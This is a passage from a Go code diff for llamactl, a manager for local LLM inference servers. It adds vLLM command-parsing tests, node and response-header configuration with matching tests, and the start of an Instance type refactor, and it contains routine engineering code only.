		return candidate == item
	})
}
// containsFlagWithValue reports whether args contains flag immediately
// followed by value.
func containsFlagWithValue(args []string, flag, value string) bool {
	// Walk adjacent pairs (args[i-1], args[i]); starting at 1 keeps both
	// indexes in range and skips empty or single-element input.
	for i := 1; i < len(args); i++ {
		if args[i-1] == flag && args[i] == value {
			return true
		}
	}
	return false
}

323
pkg/backends/vllm_test.go Normal file
View File

@@ -0,0 +1,323 @@
package backends_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/testutil"
"testing"
)
// TestParseVllmCommand runs VllmServerOptions.ParseCommand against a table of
// command lines. Each case either expects an error or supplies a validate
// callback that inspects the parsed options.
//
// The dynamic type of the returned value is checked explicitly so that a
// wrong type is reported as such rather than as a nil result.
func TestParseVllmCommand(t *testing.T) {
	tests := []struct {
		name      string
		command   string
		expectErr bool
		validate  func(*testing.T, *backends.VllmServerOptions)
	}{
		{
			name:      "basic vllm serve command",
			command:   "vllm serve microsoft/DialoGPT-medium",
			expectErr: false,
			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
				if opts.Model != "microsoft/DialoGPT-medium" {
					t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
				}
			},
		},
		{
			name:      "serve only command",
			command:   "serve microsoft/DialoGPT-medium",
			expectErr: false,
			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
				if opts.Model != "microsoft/DialoGPT-medium" {
					t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
				}
			},
		},
		{
			name:      "positional model with flags",
			command:   "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
			expectErr: false,
			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
				if opts.Model != "microsoft/DialoGPT-medium" {
					t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
				}
				if opts.TensorParallelSize != 2 {
					t.Errorf("expected tensor_parallel_size 2, got %d", opts.TensorParallelSize)
				}
			},
		},
		{
			name:      "model with path",
			command:   "vllm serve /path/to/model --gpu-memory-utilization 0.8",
			expectErr: false,
			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
				if opts.Model != "/path/to/model" {
					t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
				}
				if opts.GPUMemoryUtilization != 0.8 {
					t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization)
				}
			},
		},
		{
			name:      "multiple value types",
			command:   "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs",
			expectErr: false,
			validate: func(t *testing.T, opts *backends.VllmServerOptions) {
				if opts.Model != "test-model" {
					t.Errorf("expected model 'test-model', got '%s'", opts.Model)
				}
				if opts.TensorParallelSize != 4 {
					t.Errorf("expected tensor_parallel_size 4, got %d", opts.TensorParallelSize)
				}
				if opts.GPUMemoryUtilization != 0.8 {
					t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization)
				}
				if !opts.EnableLogOutputs {
					t.Errorf("expected enable_log_outputs true, got %v", opts.EnableLogOutputs)
				}
			},
		},
		{
			name:      "empty command",
			command:   "",
			expectErr: true,
		},
		{
			name:      "unterminated quote",
			command:   `vllm serve "unterminated`,
			expectErr: true,
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			var opts backends.VllmServerOptions
			resultAny, err := opts.ParseCommand(tt.command)

			if tt.expectErr {
				if err == nil {
					t.Errorf("expected error but got none")
				}
				return
			}
			if err != nil {
				t.Fatalf("unexpected error: %v", err)
			}

			// Assert the concrete type only on the success path, and fail
			// with the actual type when it is not what the test expects.
			result, ok := resultAny.(*backends.VllmServerOptions)
			if !ok {
				t.Fatalf("expected *VllmServerOptions, got %T", resultAny)
			}
			if result == nil {
				t.Fatalf("expected result but got nil")
			}

			if tt.validate != nil {
				tt.validate(t, result)
			}
		})
	}
}
// TestParseVllmCommandArrays verifies that repeated flags (in both
// "--flag value" and "--flag=value" forms) are collected, in order, into the
// slice-valued Middleware and APIKey options.
func TestParseVllmCommandArrays(t *testing.T) {
	command := "vllm serve test-model --middleware auth.py --middleware=cors.py --api-key key1 --api-key key2"

	var opts backends.VllmServerOptions
	resultAny, err := opts.ParseCommand(command)
	if err != nil {
		t.Fatalf("unexpected error: %v", err)
	}
	result, ok := resultAny.(*backends.VllmServerOptions)
	if !ok {
		t.Fatalf("expected *VllmServerOptions, got %T", resultAny)
	}

	// checkList compares got against want element by element. A missing
	// element is reported without indexing past the end of got; the previous
	// version indexed got[i] inside the failure message and panicked whenever
	// got was shorter than want.
	checkList := func(name, plural string, got, want []string) {
		if len(got) != len(want) {
			t.Errorf("expected %d %s, got %d", len(want), plural, len(got))
		}
		for i, w := range want {
			if i >= len(got) {
				t.Errorf("expected %s[%d]=%s but the element is missing", name, i, w)
				continue
			}
			if got[i] != w {
				t.Errorf("expected %s[%d]=%s got %s", name, i, w, got[i])
			}
		}
	}

	checkList("middleware", "middleware items", result.Middleware, []string{"auth.py", "cors.py"})
	checkList("api_key", "api keys", result.APIKey, []string{"key1", "key2"})
}
// TestVllmBuildCommandArgs_BooleanFields checks that boolean options set to
// true are rendered as bare flags and that boolean options left false do not
// appear in the argument list at all.
func TestVllmBuildCommandArgs_BooleanFields(t *testing.T) {
	type boolCase struct {
		name     string
		options  backends.VllmServerOptions
		expected []string // flags that must be present
		excluded []string // flags that must be absent
	}

	cases := []boolCase{
		{
			name:     "enable_log_outputs true",
			options:  backends.VllmServerOptions{EnableLogOutputs: true},
			expected: []string{"--enable-log-outputs"},
		},
		{
			name:     "enable_log_outputs false",
			options:  backends.VllmServerOptions{EnableLogOutputs: false},
			excluded: []string{"--enable-log-outputs"},
		},
		{
			name: "multiple booleans",
			options: backends.VllmServerOptions{
				EnableLogOutputs:    true,
				TrustRemoteCode:     true,
				EnablePrefixCaching: true,
				DisableLogStats:     false,
			},
			expected: []string{"--enable-log-outputs", "--trust-remote-code", "--enable-prefix-caching"},
			excluded: []string{"--disable-log-stats"},
		},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			built := tc.options.BuildCommandArgs()

			for _, flag := range tc.expected {
				if present := testutil.Contains(built, flag); !present {
					t.Errorf("Expected argument %q not found in %v", flag, built)
				}
			}
			for _, flag := range tc.excluded {
				if present := testutil.Contains(built, flag); present {
					t.Errorf("Excluded argument %q found in %v", flag, built)
				}
			}
		})
	}
}
// TestVllmBuildCommandArgs_ZeroValues checks that options left at their zero
// value produce neither a flag nor a value in the argument list, and that an
// empty model does not yield an empty leading positional argument.
func TestVllmBuildCommandArgs_ZeroValues(t *testing.T) {
	// Every field is spelled out at its zero value to document what is
	// expected to be omitted.
	zeroed := backends.VllmServerOptions{
		Port:                 0,
		TensorParallelSize:   0,
		GPUMemoryUtilization: 0,
		Model:                "",
		Host:                 "",
		EnableLogOutputs:     false,
	}
	built := zeroed.BuildCommandArgs()

	// Neither the flags nor their zero-valued renderings may show up.
	for _, unwanted := range []string{
		"--port", "0",
		"--tensor-parallel-size", "0",
		"--gpu-memory-utilization", "0",
		"--host", "",
		"--enable-log-outputs",
	} {
		if testutil.Contains(built, unwanted) {
			t.Errorf("Zero value argument %q should not be present in %v", unwanted, built)
		}
	}

	// An empty model must not be emitted as the positional argument.
	if len(built) != 0 && built[0] == "" {
		t.Errorf("Empty model should not be present as positional argument")
	}
}
// TestVllmBuildCommandArgs_ArrayFields checks that every element of a
// slice-valued option is emitted as its own "--flag value" pair.
func TestVllmBuildCommandArgs_ArrayFields(t *testing.T) {
	opts := backends.VllmServerOptions{
		AllowedOrigins: []string{"http://localhost:3000", "https://example.com"},
		AllowedMethods: []string{"GET", "POST"},
		Middleware:     []string{"middleware1", "middleware2", "middleware3"},
	}
	built := opts.BuildCommandArgs()

	// Flag name -> values that must each follow an occurrence of that flag.
	wantPairs := map[string][]string{
		"--allowed-origins": {"http://localhost:3000", "https://example.com"},
		"--allowed-methods": {"GET", "POST"},
		"--middleware":      {"middleware1", "middleware2", "middleware3"},
	}

	for flag, vals := range wantPairs {
		for _, val := range vals {
			if testutil.ContainsFlagWithValue(built, flag, val) {
				continue
			}
			t.Errorf("Expected %s %s, not found in %v", flag, val, built)
		}
	}
}
// TestVllmBuildCommandArgs_EmptyArrays checks that slice options which are
// non-nil but empty do not produce their flag in the argument list.
func TestVllmBuildCommandArgs_EmptyArrays(t *testing.T) {
	opts := backends.VllmServerOptions{
		AllowedOrigins: []string{},
		Middleware:     []string{},
	}
	built := opts.BuildCommandArgs()

	for _, flag := range []string{"--allowed-origins", "--middleware"} {
		if !testutil.Contains(built, flag) {
			continue
		}
		t.Errorf("Empty array should not generate argument %q in %v", flag, built)
	}
}
// TestVllmBuildCommandArgs_PositionalModel checks that the model is emitted
// as the first, bare positional argument (never as --model) and that the
// other configured options appear as flag/value pairs or bare flags.
func TestVllmBuildCommandArgs_PositionalModel(t *testing.T) {
	const model = "microsoft/DialoGPT-medium"

	opts := backends.VllmServerOptions{
		Model:                model,
		Port:                 8080,
		Host:                 "localhost",
		TensorParallelSize:   2,
		GPUMemoryUtilization: 0.8,
		EnableLogOutputs:     true,
	}
	built := opts.BuildCommandArgs()

	// Model: positional, at index 0, with no --model flag anywhere.
	if len(built) == 0 || built[0] != model {
		t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", built)
	}
	if hasModelFlag := testutil.Contains(built, "--model"); hasModelFlag {
		t.Errorf("Found --model flag, but model should be positional argument in args: %v", built)
	}

	// Remaining options, each checked together with its rendered value.
	if ok := testutil.ContainsFlagWithValue(built, "--tensor-parallel-size", "2"); !ok {
		t.Errorf("Expected --tensor-parallel-size 2 not found in %v", built)
	}
	if ok := testutil.ContainsFlagWithValue(built, "--gpu-memory-utilization", "0.8"); !ok {
		t.Errorf("Expected --gpu-memory-utilization 0.8 not found in %v", built)
	}
	if ok := testutil.Contains(built, "--enable-log-outputs"); !ok {
		t.Errorf("Expected --enable-log-outputs not found in %v", built)
	}
	if ok := testutil.ContainsFlagWithValue(built, "--host", "localhost"); !ok {
		t.Errorf("Expected --host localhost not found in %v", built)
	}
	if ok := testutil.ContainsFlagWithValue(built, "--port", "8080"); !ok {
		t.Errorf("Expected --port 8080 not found in %v", built)
	}
}

View File

@@ -1,6 +1,7 @@
package config
import (
"fmt"
"log"
"os"
"path/filepath"
@@ -13,10 +14,11 @@ import (
// BackendSettings contains structured backend configuration
type BackendSettings struct {
Command string `yaml:"command"`
Args []string `yaml:"args"`
Environment map[string]string `yaml:"environment,omitempty"`
Docker *DockerSettings `yaml:"docker,omitempty"`
Command string `yaml:"command"`
Args []string `yaml:"args"`
Environment map[string]string `yaml:"environment,omitempty"`
Docker *DockerSettings `yaml:"docker,omitempty"`
ResponseHeaders map[string]string `yaml:"response_headers,omitempty"`
}
// DockerSettings contains Docker-specific configuration
@@ -36,13 +38,15 @@ type BackendConfig struct {
// AppConfig represents the configuration for llamactl
type AppConfig struct {
Server ServerConfig `yaml:"server"`
Backends BackendConfig `yaml:"backends"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
Version string `yaml:"-"`
CommitHash string `yaml:"-"`
BuildTime string `yaml:"-"`
Server ServerConfig `yaml:"server"`
Backends BackendConfig `yaml:"backends"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
LocalNode string `yaml:"local_node,omitempty"`
Nodes map[string]NodeConfig `yaml:"nodes,omitempty"`
Version string `yaml:"-"`
CommitHash string `yaml:"-"`
BuildTime string `yaml:"-"`
}
// ServerConfig contains HTTP server configuration
@@ -56,8 +60,14 @@ type ServerConfig struct {
// Allowed origins for CORS (e.g., "http://localhost:3000")
AllowedOrigins []string `yaml:"allowed_origins"`
// Allowed headers for CORS (e.g., "Accept", "Authorization", "Content-Type", "X-CSRF-Token")
AllowedHeaders []string `yaml:"allowed_headers"`
// Enable Swagger UI for API documentation
EnableSwagger bool `yaml:"enable_swagger"`
// Response headers to send with responses
ResponseHeaders map[string]string `yaml:"response_headers,omitempty"`
}
// InstancesConfig contains instance management configuration
@@ -121,6 +131,11 @@ type AuthConfig struct {
ManagementKeys []string `yaml:"management_keys"`
}
// NodeConfig is the value type of the AppConfig.Nodes map, i.e. one entry
// under the `nodes` key of the YAML configuration.
type NodeConfig struct {
// Address is read from the `address` YAML key. The tests in this change
// leave it empty for the local node and use an HTTP URL for another node.
Address string `yaml:"address"`
// APIKey is read from the optional `api_key` YAML key.
// NOTE(review): presumably the key used when talking to that node — confirm against the caller.
APIKey string `yaml:"api_key,omitempty"`
}
// LoadConfig loads configuration with the following precedence:
// 1. Hardcoded defaults
// 2. Config file
@@ -132,8 +147,11 @@ func LoadConfig(configPath string) (AppConfig, error) {
Host: "0.0.0.0",
Port: 8080,
AllowedOrigins: []string{"*"}, // Default to allow all origins
AllowedHeaders: []string{"*"}, // Default to allow all headers
EnableSwagger: false,
},
LocalNode: "main",
Nodes: map[string]NodeConfig{},
Backends: BackendConfig{
LlamaCpp: BackendSettings{
Command: "llama-server",
@@ -198,6 +216,11 @@ func LoadConfig(configPath string) (AppConfig, error) {
return cfg, err
}
// If local node is not defined in nodes, add it with default config
if _, ok := cfg.Nodes[cfg.LocalNode]; !ok {
cfg.Nodes[cfg.LocalNode] = NodeConfig{}
}
// 3. Override with environment variables
loadEnvVars(&cfg)
@@ -209,6 +232,11 @@ func LoadConfig(configPath string) (AppConfig, error) {
cfg.Instances.LogsDir = filepath.Join(cfg.Instances.DataDir, "logs")
}
// Validate port range
if cfg.Instances.PortRange[0] <= 0 || cfg.Instances.PortRange[1] <= 0 || cfg.Instances.PortRange[0] >= cfg.Instances.PortRange[1] {
return AppConfig{}, fmt.Errorf("invalid port range: %v", cfg.Instances.PortRange)
}
return cfg, nil
}
@@ -337,6 +365,12 @@ func loadEnvVars(cfg *AppConfig) {
}
parseEnvVars(llamaDockerEnv, cfg.Backends.LlamaCpp.Docker.Environment)
}
if llamaEnv := os.Getenv("LLAMACTL_LLAMACPP_RESPONSE_HEADERS"); llamaEnv != "" {
if cfg.Backends.LlamaCpp.ResponseHeaders == nil {
cfg.Backends.LlamaCpp.ResponseHeaders = make(map[string]string)
}
parseHeaders(llamaEnv, cfg.Backends.LlamaCpp.ResponseHeaders)
}
// vLLM backend
if vllmCmd := os.Getenv("LLAMACTL_VLLM_COMMAND"); vllmCmd != "" {
@@ -380,6 +414,12 @@ func loadEnvVars(cfg *AppConfig) {
}
parseEnvVars(vllmDockerEnv, cfg.Backends.VLLM.Docker.Environment)
}
if llamaEnv := os.Getenv("LLAMACTL_VLLM_RESPONSE_HEADERS"); llamaEnv != "" {
if cfg.Backends.VLLM.ResponseHeaders == nil {
cfg.Backends.VLLM.ResponseHeaders = make(map[string]string)
}
parseHeaders(llamaEnv, cfg.Backends.VLLM.ResponseHeaders)
}
// MLX backend
if mlxCmd := os.Getenv("LLAMACTL_MLX_COMMAND"); mlxCmd != "" {
@@ -394,6 +434,12 @@ func loadEnvVars(cfg *AppConfig) {
}
parseEnvVars(mlxEnv, cfg.Backends.MLX.Environment)
}
if llamaEnv := os.Getenv("LLAMACTL_MLX_RESPONSE_HEADERS"); llamaEnv != "" {
if cfg.Backends.MLX.ResponseHeaders == nil {
cfg.Backends.MLX.ResponseHeaders = make(map[string]string)
}
parseHeaders(llamaEnv, cfg.Backends.MLX.ResponseHeaders)
}
// Instance defaults
if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
@@ -443,6 +489,11 @@ func loadEnvVars(cfg *AppConfig) {
if managementKeys := os.Getenv("LLAMACTL_MANAGEMENT_KEYS"); managementKeys != "" {
cfg.Auth.ManagementKeys = strings.Split(managementKeys, ",")
}
// Local node config
if localNode := os.Getenv("LLAMACTL_LOCAL_NODE"); localNode != "" {
cfg.LocalNode = localNode
}
}
// ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
@@ -481,6 +532,19 @@ func parseEnvVars(envString string, envMap map[string]string) {
}
}
// parseHeaders parses HTTP headers given in the format
// "KEY1=value1;KEY2=value2" and stores each pair in envMap.
//
// Pairs are separated by ';' and split at the first '=', so a value may
// itself contain '='. Surrounding whitespace is trimmed from both the header
// name and the value. Segments without '=' or with an empty header name are
// skipped. Existing entries with the same name are overwritten.
//
// envMap must be non-nil; the callers in loadEnvVars allocate it first.
func parseHeaders(envString string, envMap map[string]string) {
	// An empty envString yields a single empty segment, which is skipped
	// below because it contains no '='.
	for _, pair := range strings.Split(envString, ";") {
		name, value, found := strings.Cut(pair, "=")
		name = strings.TrimSpace(name)
		if !found || name == "" {
			continue
		}
		envMap[name] = strings.TrimSpace(value)
	}
}
// getDefaultDataDirectory returns platform-specific default data directory
func getDefaultDataDirectory() string {
switch runtime.GOOS {
@@ -546,17 +610,3 @@ func getDefaultConfigLocations() []string {
return locations
}
// GetBackendSettings returns the settings stored for the given backend type
// ("llama-cpp", "vllm" or "mlx"). Any other value yields an empty
// BackendSettings.
func (bc *BackendConfig) GetBackendSettings(backendType string) BackendSettings {
	if backendType == "llama-cpp" {
		return bc.LlamaCpp
	}
	if backendType == "vllm" {
		return bc.VLLM
	}
	if backendType == "mlx" {
		return bc.MLX
	}
	return BackendSettings{}
}

View File

@@ -7,6 +7,20 @@ import (
"testing"
)
// getBackendSettings is a test helper that picks the settings for the given
// backend type ("llama-cpp", "vllm" or "mlx") out of bc. Unknown backend
// types yield an empty config.BackendSettings.
func getBackendSettings(bc *config.BackendConfig, backendType string) config.BackendSettings {
	var selected config.BackendSettings
	switch backendType {
	case "llama-cpp":
		selected = bc.LlamaCpp
	case "vllm":
		selected = bc.VLLM
	case "mlx":
		selected = bc.MLX
	}
	return selected
}
func TestLoadConfig_Defaults(t *testing.T) {
// Test loading config when no file exists and no env vars set
cfg, err := config.LoadConfig("nonexistent-file.yaml")
@@ -205,29 +219,6 @@ instances:
}
}
// TestLoadConfig_InvalidYAML writes a malformed YAML document to a temporary
// file and expects LoadConfig to reject it with an error.
func TestLoadConfig_InvalidYAML(t *testing.T) {
	const malformed = `
server:
host: "localhost"
port: not-a-number
instances:
[invalid yaml structure
`
	path := filepath.Join(t.TempDir(), "invalid-config.yaml")
	if writeErr := os.WriteFile(path, []byte(malformed), 0644); writeErr != nil {
		t.Fatalf("Failed to write test config file: %v", writeErr)
	}

	if _, loadErr := config.LoadConfig(path); loadErr == nil {
		t.Error("Expected LoadConfig to return error for invalid YAML")
	}
}
func TestParsePortRange(t *testing.T) {
tests := []struct {
@@ -257,97 +248,6 @@ func TestParsePortRange(t *testing.T) {
}
}
// Remove the getDefaultConfigLocations test entirely
// TestLoadConfig_EnvironmentVariableTypes checks that environment variables
// holding values of the wrong type are ignored, so the corresponding
// configuration field keeps its default.
//
// Each subtest sets its variable with t.Setenv, which fails the test if the
// variable cannot be set and restores the previous value when the subtest
// ends. The earlier os.Setenv / deferred os.Unsetenv pair ignored errors and
// wiped any value the variable had before the test ran.
func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
	testCases := []struct {
		envVar   string
		envValue string
		checkFn  func(*config.AppConfig) bool // reports whether the default survived
		desc     string
	}{
		{
			envVar:   "LLAMACTL_PORT",
			envValue: "invalid-port",
			checkFn:  func(c *config.AppConfig) bool { return c.Server.Port == 8080 },
			desc:     "invalid port number should keep default",
		},
		{
			envVar:   "LLAMACTL_MAX_INSTANCES",
			envValue: "not-a-number",
			checkFn:  func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 },
			desc:     "invalid max instances should keep default",
		},
		{
			envVar:   "LLAMACTL_DEFAULT_AUTO_RESTART",
			envValue: "invalid-bool",
			checkFn:  func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart },
			desc:     "invalid boolean should keep default",
		},
		{
			envVar:   "LLAMACTL_INSTANCE_PORT_RANGE",
			envValue: "invalid-range",
			checkFn:  func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} },
			desc:     "invalid port range should keep default",
		},
	}

	for _, tc := range testCases {
		t.Run(tc.desc, func(t *testing.T) {
			t.Setenv(tc.envVar, tc.envValue)

			cfg, err := config.LoadConfig("nonexistent-file.yaml")
			if err != nil {
				t.Fatalf("LoadConfig failed: %v", err)
			}
			if !tc.checkFn(&cfg) {
				t.Errorf("Test failed: %s", tc.desc)
			}
		})
	}
}
// TestLoadConfig_PartialFile loads a config file that only sets the server
// section and checks that those values are taken from the file while the
// instances section falls back to its defaults.
func TestLoadConfig_PartialFile(t *testing.T) {
	// Only the server section is present in the file.
	const partial = `
server:
host: "partial-host"
port: 7777
`
	path := filepath.Join(t.TempDir(), "partial-config.yaml")
	if writeErr := os.WriteFile(path, []byte(partial), 0644); writeErr != nil {
		t.Fatalf("Failed to write test config file: %v", writeErr)
	}

	cfg, loadErr := config.LoadConfig(path)
	if loadErr != nil {
		t.Fatalf("LoadConfig failed: %v", loadErr)
	}

	// Values supplied by the file.
	if host := cfg.Server.Host; host != "partial-host" {
		t.Errorf("Expected host 'partial-host', got %q", host)
	}
	if port := cfg.Server.Port; port != 7777 {
		t.Errorf("Expected port 7777, got %d", port)
	}

	// Values that must come from the built-in defaults.
	if portRange := cfg.Instances.PortRange; portRange != [2]int{8000, 9000} {
		t.Errorf("Expected default port range [8000, 9000], got %v", portRange)
	}
	if maxInstances := cfg.Instances.MaxInstances; maxInstances != -1 {
		t.Errorf("Expected default max instances -1, got %d", maxInstances)
	}
}
func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
bc := &config.BackendConfig{
@@ -372,7 +272,7 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
}
// Test llama-cpp with Docker
settings := bc.GetBackendSettings("llama-cpp")
settings := getBackendSettings(bc, "llama-cpp")
if settings.Command != "custom-llama" {
t.Errorf("Expected command 'custom-llama', got %q", settings.Command)
}
@@ -387,7 +287,7 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
}
// Test vLLM without Docker
settings = bc.GetBackendSettings("vllm")
settings = getBackendSettings(bc, "vllm")
if settings.Command != "custom-vllm" {
t.Errorf("Expected command 'custom-vllm', got %q", settings.Command)
}
@@ -399,33 +299,12 @@ func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
}
// Test MLX
settings = bc.GetBackendSettings("mlx")
settings = getBackendSettings(bc, "mlx")
if settings.Command != "custom-mlx" {
t.Errorf("Expected command 'custom-mlx', got %q", settings.Command)
}
}
// TestGetBackendSettings_EmptyConfig checks that a zero-value BackendConfig
// returns settings with an empty command for each known backend type.
func TestGetBackendSettings_EmptyConfig(t *testing.T) {
	empty := &config.BackendConfig{}

	// llama-cpp, vLLM and MLX, checked in that order.
	for _, backendType := range []string{"llama-cpp", "vllm", "mlx"} {
		if cmd := empty.GetBackendSettings(backendType).Command; cmd != "" {
			t.Errorf("Expected empty command, got %q", cmd)
		}
	}
}
func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
// Test that backend environment variables work correctly
@@ -496,17 +375,132 @@ func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
}
}
func TestGetBackendSettings_InvalidBackendType(t *testing.T) {
bc := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
}
// Test invalid backend type returns empty settings
settings := bc.GetBackendSettings("invalid-backend")
if settings.Command != "" {
t.Errorf("Expected empty command for invalid backend, got %q", settings.Command)
}
// TestLoadConfig_LocalNode covers how LoadConfig resolves the local node
// name and the nodes map: the built-in default, values read from a config
// file, and the LLAMACTL_LOCAL_NODE environment override.
func TestLoadConfig_LocalNode(t *testing.T) {
t.Run("default local node", func(t *testing.T) {
// No config file and no env override: the default name is expected.
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
if cfg.LocalNode != "main" {
t.Errorf("Expected default local node 'main', got %q", cfg.LocalNode)
}
})
t.Run("local node from file", func(t *testing.T) {
tempDir := t.TempDir()
configFile := filepath.Join(tempDir, "test-config.yaml")
configContent := `
local_node: "worker1"
nodes:
worker1:
address: ""
worker2:
address: "http://192.168.1.10:8080"
api_key: "test-key"
`
err := os.WriteFile(configFile, []byte(configContent), 0644)
if err != nil {
t.Fatalf("Failed to write test config file: %v", err)
}
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
if cfg.LocalNode != "worker1" {
t.Errorf("Expected local node 'worker1', got %q", cfg.LocalNode)
}
// Verify the nodes map holds exactly the two nodes from the file
// (worker1 + worker2); no default "main" entry is expected here.
if len(cfg.Nodes) != 2 {
t.Errorf("Expected 2 nodes (default worker1 + worker2), got %d", len(cfg.Nodes))
}
// Verify local node exists and is empty
localNode, exists := cfg.Nodes["worker1"]
if !exists {
t.Error("Expected local node 'worker1' to exist in nodes map")
}
if localNode.Address != "" {
t.Errorf("Expected local node address to be empty, got %q", localNode.Address)
}
if localNode.APIKey != "" {
t.Errorf("Expected local node api_key to be empty, got %q", localNode.APIKey)
}
// Verify remote node
remoteNode, exists := cfg.Nodes["worker2"]
if !exists {
t.Error("Expected remote node 'worker2' to exist in nodes map")
}
if remoteNode.Address != "http://192.168.1.10:8080" {
t.Errorf("Expected remote node address 'http://192.168.1.10:8080', got %q", remoteNode.Address)
}
// Verify the default "main" node is absent when local_node is overridden
_, exists = cfg.Nodes["main"]
if exists {
t.Error("Default 'main' node should not exist when local_node is overridden")
}
})
t.Run("custom local node name in config", func(t *testing.T) {
tempDir := t.TempDir()
configFile := filepath.Join(tempDir, "test-config.yaml")
configContent := `
local_node: "primary"
nodes:
primary:
address: ""
worker1:
address: "http://192.168.1.10:8080"
`
err := os.WriteFile(configFile, []byte(configContent), 0644)
if err != nil {
t.Fatalf("Failed to write test config file: %v", err)
}
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
if cfg.LocalNode != "primary" {
t.Errorf("Expected local node 'primary', got %q", cfg.LocalNode)
}
// Verify the nodes map holds exactly primary + worker1 (no extra "main" entry)
if len(cfg.Nodes) != 2 {
t.Errorf("Expected 2 nodes (primary + worker1), got %d", len(cfg.Nodes))
}
localNode, exists := cfg.Nodes["primary"]
if !exists {
t.Error("Expected local node 'primary' to exist in nodes map")
}
if localNode.Address != "" {
t.Errorf("Expected local node address to be empty, got %q", localNode.Address)
}
})
t.Run("local node from environment variable", func(t *testing.T) {
// Only the resolved name is asserted here; cfg.Nodes is not inspected.
// NOTE(review): in the LoadConfig hunk of this change the missing local
// node entry is added to cfg.Nodes before env overrides are applied, so
// "custom-node" may have no entry in cfg.Nodes — confirm that is intended.
os.Setenv("LLAMACTL_LOCAL_NODE", "custom-node")
defer os.Unsetenv("LLAMACTL_LOCAL_NODE")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
if cfg.LocalNode != "custom-node" {
t.Errorf("Expected local node 'custom-node' from env var, got %q", cfg.LocalNode)
}
})
}

View File

@@ -1,276 +1,323 @@
package instance
import (
"context"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends"
"llamactl/pkg/config"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os/exec"
"sync"
"sync/atomic"
"time"
)
// TimeProvider abstracts the source of the current time so that tests can
// substitute a mock clock for the real one.
type TimeProvider interface {
// Now returns the current time as seen by this provider.
Now() time.Time
}
// Instance represents a running instance of the llama server
type Instance struct {
Name string `json:"name"`
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
// realTimeProvider implements TimeProvider using the actual time
type realTimeProvider struct{}
// Now returns the current wall-clock time from time.Now.
func (realTimeProvider) Now() time.Time {
return time.Now()
}
// Process represents a running instance of the llama server
type Process struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
// Global configuration
globalInstanceSettings *config.InstancesConfig
globalBackendSettings *config.BackendConfig
globalNodesConfig map[string]config.NodeConfig
localNodeName string `json:"-"` // Name of the local node for remote detection
// Status
Status InstanceStatus `json:"status"`
onStatusChange func(oldStatus, newStatus InstanceStatus)
status *status `json:"-"`
options *options `json:"-"`
// Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
// Logging file
logger *InstanceLogger `json:"-"`
// internal
cmd *exec.Cmd `json:"-"` // Command to run the instance
ctx context.Context `json:"-"` // Context for managing the instance lifecycle
cancel context.CancelFunc `json:"-"` // Function to cancel the context
stdout io.ReadCloser `json:"-"` // Standard output stream
stderr io.ReadCloser `json:"-"` // Standard error stream
mu sync.RWMutex `json:"-"` // RWMutex for better read/write separation
restarts int `json:"-"` // Number of restarts
proxy *httputil.ReverseProxy `json:"-"` // Reverse proxy for this instance
// Restart control
restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion
// Timeout management
lastRequestTime atomic.Int64 // Unix timestamp of last request
timeProvider TimeProvider `json:"-"` // Time provider for testing
// Components (can be nil for remote instances)
process *process `json:"-"`
proxy *proxy `json:"-"`
logger *logger `json:"-"`
}
// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalBackendSettings *config.BackendConfig, globalInstanceSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
// New creates a new instance with the given name, log path, options and local node name
func New(name string, globalConfig *config.AppConfig, opts *Options, onStatusChange func(oldStatus, newStatus Status)) *Instance {
globalInstanceSettings := &globalConfig.Instances
globalBackendSettings := &globalConfig.Backends
globalNodesConfig := globalConfig.Nodes
localNodeName := globalConfig.LocalNode
// Validate and copy options
options.ValidateAndApplyDefaults(name, globalInstanceSettings)
